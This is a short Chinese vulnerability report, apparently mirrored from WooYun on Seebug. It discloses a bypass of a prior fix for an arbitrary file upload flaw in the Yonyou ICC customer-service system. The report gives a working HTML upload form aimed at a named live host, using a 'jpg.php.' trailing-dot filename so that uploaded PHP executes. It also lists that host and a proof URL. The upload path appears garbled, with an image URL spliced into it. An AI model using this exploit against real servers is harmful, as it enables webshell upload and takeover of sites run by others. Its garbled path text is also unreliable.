再再暴用友ICC网站客服系统任意文件上传漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 再再暴用友ICC网站客服系统任意文件上传漏洞,看了一下上一个漏洞:http://www.wooyun.org/bugs/wooyun-2010-06749,发现可以饶过官方修复。 ### 详细说明: 测试多个网站均存在漏洞。 /home/ecccs/web/5107https://images.seebug.org/upload/screenImagesSave.php 具体自己看源码这里直接给出利用代码。 ``` <form enctype="multipart/form-data" method="post" action="http://icc.5107.cn/5107https://images.seebug.org/upload/screenImagesSave.php?filename=jpg.php."> <input type="file" name="file"> <input type="submit" name="up" value="上传"> </form> ``` 上一个是jpg.php 这个是只要在jpg.php后面加个.那么 上传后一样可以解析 http://xxx.com/xxx.php. 这样一样可以解析为 php 的。 测试了: http://icc.5107.cn/ ### 漏洞证明: http://icc.5107.cn/data/guige.txt [<img src="https://images.seebug.org/upload/201206/061834473941b156dd33a18ebc6af243d013cb39.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201206/061834473941b156dd33a18ebc6af243d013cb39.jpg)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息